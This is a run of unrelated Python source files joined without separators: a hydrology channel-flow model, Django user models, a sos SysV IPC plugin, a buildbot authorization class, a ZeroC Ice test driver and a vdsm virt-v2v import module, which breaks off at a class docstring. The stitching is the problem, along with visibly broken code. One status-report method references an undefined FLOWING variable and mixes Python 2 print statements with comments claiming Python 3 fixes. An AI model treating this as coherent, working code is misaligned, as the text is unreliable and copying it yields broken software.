                model_output.open_new_gs_file( self,
                                               getattr(self, vname + '_gs_file'),
                                               self.rti,
                                               var_name=vname,
                                               long_name=lname,
                                               units_name=units )

        #--------------------------------------
        # Open new files to write time series
        #--------------------------------------
        IDs = self.outlet_IDs
        for (vname, lname, units) in var_info:
            if getattr(self, 'SAVE_' + vname.upper() + '_PIXELS'):
                model_output.open_new_ts_file( self,
                                               getattr(self, vname + '_ts_file'),
                                               IDs,
                                               var_name=vname,
                                               long_name=lname,
                                               units_name=units )
        
    #   open_output_files()
    #-------------------------------------------------------------------  
    def write_output_files(self, time_seconds=None):

        """Write sampled output if model time hits a sampling interval.

        time_seconds: model time in seconds; defaults to self.time_sec
        (allows a caller to pass its own clock).  Grids are saved every
        save_grid_dt seconds and pixel values every save_pixels_dt
        seconds; read_cfg_file() guarantees both are >= the process dt.
        """
        if (time_seconds is None):
            time_seconds = self.time_sec
        t = int(time_seconds)

        #----------------------------------------
        # Save computed values at sampled times
        #----------------------------------------
        if (t % int(self.save_grid_dt)) == 0:
            self.save_grids()
        if (t % int(self.save_pixels_dt)) == 0:
            self.save_pixel_values()
        
    #   write_output_files()
    #-------------------------------------------------------------------  
    def close_output_files(self):

        """Close every output file opened by open_output_files():
        grid-stack files first, then time-series files."""
        for vname in ('Q', 'u', 'd', 'f'):
            if getattr(self, 'SAVE_' + vname.upper() + '_GRIDS'):
                model_output.close_gs_file( self, vname )
        for vname in ('Q', 'u', 'd', 'f'):
            if getattr(self, 'SAVE_' + vname.upper() + '_PIXELS'):
                model_output.close_ts_file( self, vname )
        
    #   close_output_files()              
    #-------------------------------------------------------------------  
    def save_grids(self):

        """Append the current Q, u, d, f grids to their netCDF grid
        stacks.  add_grid() converts a scalar to a grid if needed."""
        for vname in ('Q', 'u', 'd', 'f'):
            if getattr(self, 'SAVE_' + vname.upper() + '_GRIDS'):
                model_output.add_grid( self, getattr(self, vname),
                                       vname, self.time_min )

    #   save_grids()
    #-------------------------------------------------------------------  
    def save_pixel_values(self):   ##### save_time_series_data(self)  #######

        """Append the current values of Q, u, d, f at the outlet
        pixels (self.outlet_IDs) to their time-series files."""
        IDs  = self.outlet_IDs
        time = self.time_min

        for vname in ('Q', 'u', 'd', 'f'):
            if getattr(self, 'SAVE_' + vname.upper() + '_PIXELS'):
                model_output.add_values_at_IDs( self, time,
                                                getattr(self, vname),
                                                vname, IDs )
        
    #   save_pixel_values()
    #-------------------------------------------------------------------
    def manning_formula(self):

        """Return flow velocity u [m/s] from Manning's formula.

        u = Rh^(2/3) * sqrt(S) / n, where
          Rh = hydraulic radius [m]  (self.Rh; may be a 2D array)
          S  = bed slope (kinematic wave) or free-surface slope
          n  = Manning roughness coefficient (typically 0.012-0.035)

        All lengths are in meters; if they were in feet an extra
        factor of 1.49 would be required.  Note that Q = Ac * u,
        where Ac is cross-section area (not w*d for a trapezoid).

        BUG FIX: the else-branch was tab-indented (mixed tabs and
        spaces), which is an IndentationError in Python 3.
        """
        if (self.KINEMATIC_WAVE):
            S = self.S_bed
        else:
            S = self.S_free

        u = (self.Rh ** self.two_thirds) * np.sqrt(S) / self.nval

        #--------------------------------------------------------
        # Add a hydraulic jump option for when u gets too big ?
        #--------------------------------------------------------
        return u
    
    #   manning_formula()
    #-------------------------------------------------------------------
    def law_of_the_wall(self):

        """Return flow velocity u [m/s] from the law of the wall.

        u = law_const * sqrt(Rh * S) * ln(smoothness), where
          smoothness = (aval / z0) * d, clamped to >= 1.1 so the
                       log stays positive (should warn when clamped)
          law_const  = sqrt(g) / kappa = 7.6393
          kappa      = 0.41 (von Karman constant)
          aval       = 0.48 (integration constant)
          d, S, z0 may be arrays; S is bed slope (kinematic wave)
          or free-surface slope.

        To match a default Manning n, one can use the approximation
        z0 = a * (2.34 * sqrt(9.81) * n / kappa)^6 (n=0.03 gives
        z0 = 0.011417), but it breaks down outside a limited range
        (n=0.3 gives an absurd z0 of 11.4 km).

        BUG FIX: the else-branch was tab-indented (mixed tabs and
        spaces), which is an IndentationError in Python 3.
        """
        if (self.KINEMATIC_WAVE):
            S = self.S_bed
        else:
            S = self.S_free

        smoothness = (self.aval / self.z0val) * self.d

        #------------------------------------------------
        # Make sure (smoothness > 1) before taking log.
        #------------------------------------------------
        smoothness = np.maximum(smoothness, np.float64(1.1))

        u = self.law_const * np.sqrt(self.Rh * S) * np.log(smoothness)

        #--------------------------------------------------------
        # Add a hydraulic jump option for when u gets too big ?
        #--------------------------------------------------------
        return u
    
    #   law_of_the_wall()
    #-------------------------------------------------------------------
    def print_status_report(self): 

        """Print a status report: percentage of pixels with flow,
        domain mins and maxes, and where the max discharge occurs.

        NOTE(review): FLOWING is referenced below but never defined
        in this method (its definition is commented out), so calling
        this raises NameError.  The commented line suggests
        FLOWING = (d > (z0 / aval)) was intended -- confirm before
        re-enabling.
        """
        #----------------------------------------------------
        # Wherever depth is less than z0, assume that water
        # is not flowing and set u and Q to zero.
        # However, we also need (d gt 0) to avoid a divide
        # by zero problem, even when numerators are zero.
        #----------------------------------------------------
        # FLOWING = (d > (z0/aval))
        #*** FLOWING[noflow_IDs] = False    ;******
        
        wflow    = np.where( FLOWING != 0 )
        n_flow   = np.size( wflow[0] )
        n_pixels = self.rti.n_pixels
        # Percentage of grid cells that currently have flow.
        percent  = np.float64(100.0) * (np.float64(n_flow) / n_pixels)
        fstr = ('%5.1f' % percent) + '%'
        print ' Percentage of pixels with flow = ' + fstr
        print ' '

        # Also prints the running mins and maxes (REPORT=True).
        self.update_mins_and_maxes(REPORT=True)
 
        # Locate the cell(s) where Q equals the stored maximum.
        wmax  = np.where(self.Q == self.Q_max)
        nwmax = np.size(wmax[0])
        print ' Max(Q) occurs at: ' + str( wmax[0] )
        #print,' Max attained at ', nwmax, ' pixels.'
        print ' '
        print '-------------------------------------------------'

    #   print_status_report()         
    #-------------------------------------------------------------------
    def remove_bad_slopes(self, FLOAT=False):

        """Replace nonpositive or non-finite slopes with the smallest
        positive slope in the grid.

        Pixels on the DEM edges (and sometimes interior pixels with a
        nonzero flow code but NaN slope) can have S <= 0.  With the
        Kinematic Wave option, flow cannot leave a zero-slope pixel,
        so depth grows into an unrealistic spike.  A better fix is an
        "imposed gradient DEM" or profile smoothing.  (7/18/05: broke
        this out into a separate procedure.)

        FLOAT: if True store the slope grid as float32, else float64.
        """
        #---------------------------------------------------
        # Compute the bad-pixel mask once and reuse it for
        # both the bad (wb) and good (wg) index lookups.
        #---------------------------------------------------
        bad = np.logical_or( (self.slope <= 0.0),
                             np.logical_not(np.isfinite(self.slope)) )
        wb   = np.where( bad )
        nbad = np.size( wb[0] )
        print('size(slope) = ' + str(np.size(self.slope)))
        print('size(wb) = ' + str(nbad))

        wg    = np.where( np.invert(bad) )
        ngood = np.size( wg[0] )
        # Nothing to fix, or nothing to fix it with.
        if (nbad == 0) or (ngood == 0):
            return

        #---------------------------------------------
        # Find smallest positive value in slope grid
        # and replace the "bad" values with S_min.
        #---------------------------------------------
        print('-------------------------------------------------')
        print('WARNING: Zero or negative slopes found.')
        print('         Replacing them with smallest slope.')
        print('         Use "Profile smoothing tool" instead.')
        S_min = self.slope[wg].min()
        S_max = self.slope[wg].max()
        print('         min(S) = ' + str(S_min))
        print('         max(S) = ' + str(S_max))
        print('-------------------------------------------------')
        print(' ')
        self.slope[wb] = S_min

        #------------------------------------------------
        # Convert data type: FLOAT=True means single
        # precision (float32); default is double.
        #------------------------------------------------
        if (FLOAT):
            self.slope = self.slope.astype(np.float32)
        else:
            self.slope = self.slope.astype(np.float64)
        
    #   remove_bad_slopes
    #-------------------------------------------------------------------

#-------------------------------------------------------------------
def Trapezoid_Rh(d, wb, theta):

    #-------------------------------------------------------------
    # Notes: Compute the hydraulic radius of a trapezoid that:
    #          (1) has a bed width of wb >= 0 (0 for triangular)
    #          (2) has a bank angle of theta (0 for rectangular)
    #          (3) is filled with water to a depth of d.
    #        The units of wb and d are meters.  The units of
    #        theta are assumed to be degrees and are converted.
    #-------------------------------------------------------------
    # NB!    wb should never be zero, so PW can never be 0,
    #        which would produce a NaN (divide by zero).
    #-------------------------------------------------------------
    #        See Notes for TF_Tan function in utils_TF.pro
    #            AW = d * (wb + (d * TF_Tan(theta_rad)) )
    #-------------------------------------------------------------
    # Fix:   removed the unused "w"/"nw" locals (np.where over wb)
    #        that were computed and then discarded.
    #-------------------------------------------------------------
    theta_rad = (theta * np.pi / 180.0)

    # Wetted cross-sectional area and wetted perimeter.
    AW = d * (wb + (d * np.tan(theta_rad)) )
    PW = wb + (np.float64(2) * d / np.cos(theta_rad) )
    Rh = (AW / PW)

    return Rh

#   Trapezoid_Rh()
#-------------------------------------------------------------------
def Manning_Formula(Rh, S, nval):

    #---------------------------------------------------------
    # Notes: Rh   = (A/P) = hydraulic radius [m]
    #        nval = Manning's roughness coefficient
    #               (usually in the range 0.012 to 0.035)
    #        S    = bed slope (assumed equal to friction slope)
    #
    #        Rh, S, and nval may be 2D arrays.
    #
    #        If length units are all *feet*, then an extra
    #        factor of 1.49 must be applied.  If units are
    #        meters, no such factor is needed.
    #
    #        Note that Q = Ac * u, where Ac is cross-section
    #        area.  For a trapezoid, Ac does not equal w*d.
    #---------------------------------------------------------
    exponent = np.float64(2) / 3.0

    velocity = np.sqrt(S) * (Rh ** exponent) / nval

    #------------------------------
    # Add a hydraulic jump option
    # for when u gets too big ??
    #------------------------------
    return velocity

#   Manning_Formula()
#-------------------------------------------------------------------
def Law_of_the_Wall(d, Rh, S, z0val):

    #---------------------------------------------------------
    # Notes: u     = flow velocity  [m/s]
    #        d     = flow depth [m]
    #        z0val = roughness height
    #        S     = bed slope (assumed equal to friction slope)
    #
    #        g     = 9.81 = gravitation constant [m/s^2]
    #        kappa = 0.41 = von Karman's constant
    #        aval  = 0.48 = integration constant
    #
    #        sqrt(g)/kappa = 7.6393d
    #        smoothness = (aval / z0) * d
    #        f = (kappa / alog(smoothness))^2d
    #        tau_bed = rho_w * f * u^2 = rho_w * g * d * S
    #
    #        d, S, and z0val can be arrays.
    #
    #        To make default z0 correspond to default
    #        Manning's n, can use this approximation:
    #        z0 = a * (2.34 * sqrt(9.81) * n / kappa)^6d
    #        For n=0.03, this gives: z0 = 0.011417
    #        However, for n=0.3, it gives: z0 = 11417.413
    #        which is 11.4 km!  So the approximation only
    #        holds within some range of values.
    #--------------------------------------------------------

    #------------------------
    # Define some constants
    #------------------------
    g         = np.float64(9.81)    # (gravitation const.)
    a_const   = np.float64(0.476)   # (integration const.)
    kappa     = np.float64(0.408)   # (von Karman's const.)
    prefactor = np.sqrt(g) / kappa

    #--------------------------------------------------
    # Relative smoothness, floored at 1.1 so that the
    # logarithm below stays strictly positive.
    #--------------------------------------------------
    smoothness = np.maximum((a_const / z0val) * d, np.float64(1.1))

    velocity = prefactor * np.sqrt(Rh * S) * np.log(smoothness)

    #------------------------------
    # Add a hydraulic jump option
    # for when u gets too big ??
    #------------------------------
    return velocity
from django.db import models
from django.contrib.auth.models import User


class OrganisationType(models.Model):
    # Lookup table of organisation types, identified by a free-text
    # description (shown wherever the object is rendered).
    type_desc = models.CharField(max_length=200)
    def __unicode__(self):
        return self.type_desc


class Address(models.Model):
    # Postal address; rendered as "<street_address>,<city>".
    street_address = models.CharField(max_length=100)
    city = models.CharField(max_length=100)
    pin = models.CharField(max_length=10)      # postal/PIN code
    province = models.CharField(max_length=100)
    nationality = models.CharField(max_length=100)
    def __unicode__(self):
        return self.street_address + ',' + self.city


class HattiUser(models.Model):
    # Abstract base for site users: links a Django auth User to an
    # address and contact details.  No table is created for this model
    # (Meta.abstract); concrete subclasses inherit all the fields.
    user = models.OneToOneField(User)
    address = models.ForeignKey(Address)
    telephone = models.CharField(max_length=500)
    date_joined  = models.DateTimeField(auto_now_add=True)
    fax = models.CharField(max_length=100)
    avatar = models.CharField(max_length=100, null=True, blank=True)
    tagline = models.CharField(max_length=140)
    class Meta:
        abstract = True


class AdminOrganisations(HattiUser):
    # An organisation managed by an admin user, typed via OrganisationType.
    title = models.CharField(max_length=200)
    organisation_type = models.ForeignKey(OrganisationType)
    def __unicode__(self):
        return self.title


class Customer(HattiUser):
    # A customer account; may represent an individual or an organisation
    # (is_org), optionally tied to a company name.
    title = models.CharField(max_length=200, blank=True, null=True)
    is_org = models.BooleanField()
    org_type = models.ForeignKey(OrganisationType)
    company = models.CharField(max_length=200)
    def __unicode__(self):
        # Bug fix: the method previously took a spurious "arg" parameter,
        # so unicode(customer) raised TypeError (Django calls __unicode__
        # with no extra arguments).  The body was also tab-indented while
        # the rest of the file uses spaces.
        return unicode(self.user)


## Copyright (C) 2007-2012 Red Hat, Inc., Bryn M. Reeves <bmr@redhat.com>
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.

## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
## GNU General Public License for more details.

## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin

class SysVIPC(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
    """SysV IPC related information
    """

    plugin_name = "sysvipc"

    def setup(self):
        # Capture the kernel's SysV IPC state files plus the ipcs summary.
        proc_files = [
            "/proc/sysvipc/msg",
            "/proc/sysvipc/sem",
            "/proc/sysvipc/shm"
        ]
        self.add_copy_specs(proc_files)
        self.add_cmd_output("ipcs")

# vim: et ts=4 sw=4

from buildbot.status.web.auth import IAuth

class Authz(object):
    """Decide who can do what."""

    knownActions = [
    # If you add a new action here, be sure to also update the documentation
    # at docs/cfg-statustargets.texinfo
            'gracefulShutdown',
            'forceBuild',
            'forceAllBuilds',
            'pingBuilder',
            'stopBuild',
            'stopAllBuilds',
            'cancelPendingBuild',
    ]

    def __init__(self,
            default_action=False,
            auth=None,
            **kwargs):
        """
        default_action -- setting for any action not named in kwargs:
                          False (deny), True (allow anyone), 'auth'
                          (any authenticated user), or a callable
                          cfg(user, *args) deciding per-user.
        auth           -- an IAuth provider; required at runtime when any
                          action is configured as 'auth' or a callable.
        kwargs         -- per-action settings keyed by action name;
                          unknown names raise ValueError.
        """
        self.auth = auth
        if auth:
            assert IAuth.providedBy(auth)

        self.config = dict((a, default_action) for a in self.knownActions)
        for act in self.knownActions:
            if act in kwargs:
                self.config[act] = kwargs.pop(act)

        if kwargs:
            raise ValueError("unknown authorization action(s) " + ", ".join(kwargs.keys()))

    def _get_action_config(self, action):
        # Shared guard: referring to an unknown action is a caller bug.
        if action not in self.knownActions:
            raise KeyError("unknown action")
        return self.config.get(action, False)

    def advertiseAction(self, action):
        """Should the web interface even show the form for ACTION?"""
        return bool(self._get_action_config(action))

    def needAuthForm(self, action):
        """Does this action require an authentication form?"""
        cfg = self._get_action_config(action)
        return cfg == 'auth' or callable(cfg)

    def actionAllowed(self, action, request, *args):
        """Is this ACTION allowed, given this http REQUEST?"""
        cfg = self._get_action_config(action)
        if not cfg:
            # Bug fix: this case previously fell off the end of the
            # method and returned None instead of False.
            return False
        if cfg != 'auth' and not callable(cfg):
            return True # anyone can do this..
        if not self.auth:
            return False
        user = request.args.get("username", ["<unknown>"])[0]
        passwd = request.args.get("passwd", ["<no-password>"])[0]
        if user == "<unknown>" or passwd == "<no-password>":
            return False
        if not self.auth.authenticate(user, passwd):
            return False
        if callable(cfg) and not cfg(user, *args):
            return False
        return True

#! /usr/bin/env python
# encoding: UTF-8

'''give access permission for files in this folder'''

#!/usr/bin/env python
# **********************************************************************
#
# Copyright (c) 2003-2011 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************

import os, sys, traceback

import Ice, AllTests

def test(b):
    if not b:
        raise RuntimeError('test assertion failed')

def usage(n):
    """Write a usage line for program name *n* to stderr."""
    sys.stderr.write("Usage: " + n + " port...\n")

def run(args, communicator):
    """Parse port arguments from *args* and drive AllTests.

    Returns True on success, False on bad command-line usage; a failure
    inside AllTests aborts via test(False).
    """
    ports = []
    for arg in args[1:]:
        if arg[0] == '-':
            sys.stderr.write(args[0] + ": unknown option `" + arg + "'\n")
            usage(args[0])
            return False
        ports.append(int(arg))

    if not ports:
        sys.stderr.write(args[0] + ": no ports specified\n")
        usage(args[0])
        return False

    try:
        AllTests.allTests(communicator, ports)
    except:
        # Any exception (even unexpected ones) fails the test run.
        traceback.print_exc()
        test(False)

    return True

# Bug fix: pre-initialize so the cleanup code below cannot raise
# NameError when Ice.initialize (or property parsing) fails before
# "communicator"/"status" are ever assigned.
communicator = None
status = False

try:
    initData = Ice.InitializationData()
    initData.properties = Ice.createProperties(sys.argv)

    #
    # This test aborts servers, so we don't want warnings.
    #
    initData.properties.setProperty('Ice.Warn.Connections', '0')

    communicator = Ice.initialize(sys.argv, initData)
    status = run(sys.argv, communicator)
except:
    traceback.print_exc()
    status = False

if communicator:
    try:
        communicator.destroy()
    except:
        traceback.print_exc()
        status = False

# Exit code 0 on success, 1 on failure.
sys.exit(not status)

# Copyright 2014-2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
"""
When importing a VM a thread start with a new process of virt-v2v.
The way to feedback the information on the progress and the status of the
process (ie job) is via getVdsStats() with the fields progress and status.
progress is a number which represent percentage of a single disk copy,
status is a way to feedback information on the job (init, error etc)
"""

from __future__ import absolute_import

from collections import namedtuple
from contextlib import closing, contextmanager
import errno
import io
import logging
import os
import re
import subprocess
import tarfile
import time
import threading
import xml.etree.ElementTree as ET
import zipfile

import libvirt

from vdsm.cmdutils import wrap_command
from vdsm.commands import execCmd, BUFFSIZE
from vdsm.common import cmdutils
from vdsm.common.define import errCode, doneCode
from vdsm.common import response
from vdsm.common import zombiereaper
from vdsm.common.compat import CPopen
from vdsm.common.logutils import traceback
from vdsm.common.time import monotonic_time
from vdsm.constants import P_VDSM_LOG, P_VDSM_RUN, EXT_KVM_2_OVIRT
from vdsm import concurrent, libvirtconnection
from vdsm import password
from vdsm.utils import terminating, NICENESS, IOCLASS

try:
    import ovirt_imageio_common
except ImportError:
    ovirt_imageio_common = None


# Registry of running import jobs; all access is guarded by _lock.
_lock = threading.Lock()
_jobs = {}

# Runtime/log directories and external command paths used by the importer.
_V2V_DIR = os.path.join(P_VDSM_RUN, 'v2v')
_LOG_DIR = os.path.join(P_VDSM_LOG, 'import')
_VIRT_V2V = cmdutils.CommandPath('virt-v2v', '/usr/bin/virt-v2v')
_SSH_AGENT = cmdutils.CommandPath('ssh-agent', '/usr/bin/ssh-agent')
_SSH_ADD = cmdutils.CommandPath('ssh-add', '/usr/bin/ssh-add')
# URI scheme prefixes used to pick the import command class.
_XEN_SSH_PROTOCOL = 'xen+ssh'
_VMWARE_PROTOCOL = 'vpx'
_KVM_PROTOCOL = 'qemu'
# Parses ssh-agent startup output such as:
#   SSH_AUTH_SOCK=/tmp/ssh-XXXX/agent.1234; export SSH_AUTH_SOCK;
#   SSH_AGENT_PID=1234; ...
_SSH_AUTH_RE = '(SSH_AUTH_SOCK)=([^;]+).*;\nSSH_AGENT_PID=(\d+)'
# OVF ResourceType codes (see the RASD schema referenced below).
_OVF_RESOURCE_CPU = 3
_OVF_RESOURCE_MEMORY = 4
_OVF_RESOURCE_NETWORK = 10
# qcow2 compat levels accepted for the --vdsm-compat option.
_QCOW2_COMPAT_SUPPORTED = ('0.10', '1.1')

# OVF Specification:
# https://www.iso.org/obp/ui/#iso:std:iso-iec:17203:ed-1:v1:en
_OVF_NS = 'http://schemas.dmtf.org/ovf/envelope/1'
_RASD_NS = 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/' \
           'CIM_ResourceAllocationSettingData'

# Progress records reported while parsing virt-v2v output.
ImportProgress = namedtuple('ImportProgress',
                            ['current_disk', 'disk_count', 'description'])
DiskProgress = namedtuple('DiskProgress', ['progress'])


class STATUS:
    '''
    States of an import job:
    STARTING: request granted and starting the import process
    COPYING_DISK: copying disk in progress
    ABORTED: user initiated abort
    FAILED: error during import process
    DONE: convert process successfully finished
    '''
    STARTING = 'starting'
    COPYING_DISK = 'copying_disk'
    ABORTED = 'aborted'
    FAILED = 'error'
    DONE = 'done'


class V2VError(Exception):
    ''' Base class for v2v errors '''
    # err_name maps the exception to an entry in errCode for responses.
    err_name = 'unexpected'  # TODO: use more specific error


class ClientError(Exception):
    ''' Base class for client errors '''
    # err_name maps the exception to an entry in errCode for responses.
    err_name = 'unexpected'


class InvalidVMConfiguration(ValueError):
    ''' Unexpected error while parsing libvirt domain xml '''


class OutputParserError(V2VError):
    ''' Error while parsing virt-v2v output '''


class JobExistsError(ClientError):
    ''' A job with this id already exists in the _jobs collection '''
    err_name = 'JobExistsError'


class VolumeError(ClientError):
    ''' Error preparing volume '''


class NoSuchJob(ClientError):
    ''' Raised when a job id does not exist in the _jobs collection '''
    err_name = 'NoSuchJob'


class JobNotDone(ClientError):
    ''' Import process still in progress '''
    err_name = 'JobNotDone'


class NoSuchOvf(V2VError):
    ''' Raised when the ovf file does not exist under /var/run/vdsm/v2v/ '''
    err_name = 'V2VNoSuchOvf'


class V2VProcessError(V2VError):
    ''' virt-v2v process had an error during execution '''


class InvalidInputError(ClientError):
    ''' Invalid input received '''


def get_external_vms(uri, username, password, vm_names=None):
    """List VMs on an external hypervisor, optionally filtered by name.

    Returns a vmList response on success, or a V2VConnection error
    response if connecting to the hypervisor fails.
    """
    if vm_names is not None:
        # Empty filter means "no filter"; otherwise use set lookup.
        vm_names = frozenset(vm_names) if vm_names else None

    try:
        conn = libvirtconnection.open_connection(uri=uri,
                                                 username=username,
                                                 passwd=password)
    except libvirt.libvirtError as e:
        logging.exception('error connecting to hypervisor')
        return {'status': {'code': errCode['V2VConnection']['status']['code'],
                           'message': str(e)}}

    with closing(conn):
        vms = []
        for vm in _list_domains(conn):
            if vm_names is not None and vm.name() not in vm_names:
                # Skip this VM.
                continue
            if conn.getType() == "ESX" and _vm_has_snapshot(vm):
                logging.error("vm %r has snapshots and therefore can not be "
                              "imported since snapshot conversion is not "
                              "supported for VMware", vm.name())
                continue
            _add_vm(conn, vms, vm)
        return {'status': doneCode, 'vmList': vms}


def get_external_vm_names(uri, username, password):
    """Return only the names of the VMs defined on an external hypervisor."""
    try:
        conn = libvirtconnection.open_connection(uri=uri,
                                                 username=username,
                                                 passwd=password)
    except libvirt.libvirtError as e:
        logging.exception('error connecting to hypervisor')
        return response.error('V2VConnection', str(e))

    with closing(conn):
        names = [dom.name() for dom in _list_domains(conn)]
        return response.success(vmNames=names)


def convert_external_vm(uri, username, password, vminfo, job_id, irs):
    """Start an import job converting a VM from an external hypervisor.

    The command class is chosen by the uri scheme (xen+ssh, vpx, qemu).
    Raises V2VError/ClientError for unsupported or unknown protocols.
    """
    if uri.startswith(_XEN_SSH_PROTOCOL):
        command = XenCommand(uri, vminfo, job_id, irs)
    elif uri.startswith(_VMWARE_PROTOCOL):
        command = LibvirtCommand(uri, username, password, vminfo, job_id,
                                 irs)
    elif uri.startswith(_KVM_PROTOCOL):
        if ovirt_imageio_common is None:
            # Bug fix: adjacent string literals were concatenated without
            # a space ("...ovirt_imageio_commonpackage...").
            raise V2VError('Unsupported protocol KVM, ovirt_imageio_common '
                           'package is needed for importing KVM images')
        command = KVMCommand(uri, username, password, vminfo, job_id, irs)
    else:
        # Bug fix: the uri was passed as a spare constructor argument and
        # never interpolated into the message; format it explicitly.
        raise ClientError('Unknown protocol for Libvirt uri: %s' % uri)
    job = ImportVm(job_id, command)
    job.start()
    _add_job(job_id, job)
    return {'status': doneCode}


def convert_ova(ova_path, vminfo, job_id, irs):
    """Start an import job converting an OVA file into a VM."""
    ova_job = ImportVm(job_id, OvaCommand(ova_path, vminfo, job_id, irs))
    ova_job.start()
    _add_job(job_id, ova_job)
    return response.success()


def get_ova_info(ova_path):
    """Return general, disk and network details parsed from an OVA's OVF."""
    ns = {'ovf': _OVF_NS, 'rasd': _RASD_NS}

    try:
        ovf_root = ET.fromstring(_read_ovf_from_ova(ova_path))
    except ET.ParseError as e:
        raise V2VError('Error reading ovf from ova, position: %r' % e.position)

    vm = {}
    _add_general_ovf_info(vm, ovf_root, ns, ova_path)
    _add_disks_ovf_info(vm, ovf_root, ns)
    _add_networks_ovf_info(vm, ovf_root, ns)

    return response.success(vmList=vm)


def get_converted_vm(job_id):
    """Return the OVF produced by a finished import job.

    Client errors are logged at info level, v2v errors at error level;
    both are translated to the matching errCode response.
    """
    try:
        job = _get_job(job_id)
        _validate_job_done(job)
        document = _read_ovf(job_id)
    except ClientError as e:
        logging.info('Converted VM error %s', e)
        return errCode[e.err_name]
    except V2VError as e:
        logging.error('Converted VM error %s', e)
        return errCode[e.err_name]
    else:
        return {'status': doneCode, 'ovf': document}


def delete_job(job_id):
    """Remove a job from the registry once it has finished or aborted."""
    try:
        finished = _get_job(job_id)
        _validate_job_finished(finished)
        _remove_job(job_id)
    except ClientError as e:
        logging.info('Cannot delete job, error: %s', e)
        return errCode[e.err_name]
    return {'status': doneCode}


def abort_job(job_id):
    """Ask a running import job to stop."""
    try:
        _get_job(job_id).abort()
    except ClientError as e:
        logging.info('Cannot abort job, error: %s', e)
        return errCode[e.err_name]
    return {'status': doneCode}


def get_jobs_status():
    """Snapshot status/description/progress for every registered job.

    The registry is copied under the lock; job attributes are read
    afterwards so the lock is held only briefly.
    """
    with _lock:
        snapshot = tuple(_jobs.items())
    return dict((job_id, {'status': job.status,
                          'description': job.description,
                          'progress': job.progress})
                for job_id, job in snapshot)


def _add_job(job_id, job):
    """Register *job* under *job_id*; duplicate ids are an error."""
    with _lock:
        if job_id not in _jobs:
            _jobs[job_id] = job
        else:
            raise JobExistsError("Job %r exists" % job_id)


def _get_job(job_id):
    """Look up a registered job; raise NoSuchJob if it is absent."""
    with _lock:
        if job_id in _jobs:
            return _jobs[job_id]
        raise NoSuchJob("No such job %r" % job_id)


def _remove_job(job_id):
    """Drop a job from the registry; raise NoSuchJob if it is absent."""
    with _lock:
        if job_id in _jobs:
            del _jobs[job_id]
        else:
            raise NoSuchJob("No such job %r" % job_id)


def _validate_job_done(job):
    """Raise JobNotDone unless the job reached the DONE state."""
    if job.status == STATUS.DONE:
        return
    raise JobNotDone("Job %r is %s" % (job.id, job.status))


def _validate_job_finished(job):
    """Raise JobNotDone while the job has not reached a terminal state."""
    terminal_states = (STATUS.DONE, STATUS.FAILED, STATUS.ABORTED)
    if job.status in terminal_states:
        return
    raise JobNotDone("Job %r is %s" % (job.id, job.status))


def _read_ovf(job_id):
    """Return the OVF text written for *job_id*; raise NoSuchOvf if missing."""
    file_name = os.path.join(_V2V_DIR, "%s.ovf" % job_id)
    try:
        with open(file_name, 'r') as ovf_file:
            return ovf_file.read()
    except IOError as e:
        if e.errno == errno.ENOENT:
            raise NoSuchOvf("No such ovf %r" % file_name)
        raise


class SSHAgent(object):
    """
    virt-v2v uses ssh-agent for importing xen vms from libvirt,
    after virt-v2v log in to the machine it needs to copy its disks
    which ssh-agent let it handle without passwords while the session
    is on.
    for more information please refer to the virt-v2v man page:
    http://libguestfs.org/virt-v2v.1.html

    Used as a context manager: __enter__ spawns an agent and registers
    the default key, __exit__ unregisters the key and kills the agent.
    """
    def __init__(self):
        self._auth = None        # {'SSH_AUTH_SOCK': <socket path>} once started
        self._agent_pid = None   # PID of the spawned ssh-agent
        self._ssh_auth_re = re.compile(_SSH_AUTH_RE)

    def __enter__(self):
        # Start the agent and parse its announced socket/PID.
        rc, out, err = execCmd([_SSH_AGENT.cmd], raw=True)
        if rc != 0:
            raise V2VError('Error init ssh-agent, exit code: %r'
                           ', out: %r, err: %r' %
                           (rc, out, err))

        m = self._ssh_auth_re.match(out)
        # looking for: SSH_AUTH_SOCK=/tmp/ssh-VEE74ObhTWBT/agent.29917
        self._auth = {m.group(1): m.group(2)}
        self._agent_pid = m.group(3)

        # Register the default key; on failure don't leak the agent.
        try:
            rc, out, err = execCmd([_SSH_ADD.cmd], env=self._auth)
        except:
            self._kill_agent()
            raise

        if rc != 0:
            # ssh-add exit codes:
            # 1 = general fail
            # 2 = no agent (nothing to kill in that case)
            if rc != 2:
                self._kill_agent()
            raise V2VError('Error init ssh-add, exit code: %r'
                           ', out: %r, err: %r' %
                           (rc, out, err))

    def __exit__(self, *args):
        # Unregister the key first, then always kill the agent.
        rc, out, err = execCmd([_SSH_ADD.cmd, '-d'], env=self._auth)
        if rc != 0:
            logging.error('Error deleting ssh-add, exit code: %r'
                          ', out: %r, err: %r' %
                          (rc, out, err))

        self._kill_agent()

    def _kill_agent(self):
        # Best effort: a failure to kill is logged, not raised.
        rc, out, err = execCmd([_SSH_AGENT.cmd, '-k'],
                               env={'SSH_AGENT_PID': self._agent_pid})
        if rc != 0:
            logging.error('Error killing ssh-agent (PID=%r), exit code: %r'
                          ', out: %r, err: %r' %
                          (self._agent_pid, rc, out, err))

    @property
    def auth(self):
        # Environment mapping (SSH_AUTH_SOCK) to pass to child processes.
        return self._auth


class V2VCommand(object):
    """Base class for building and running a virt-v2v import.

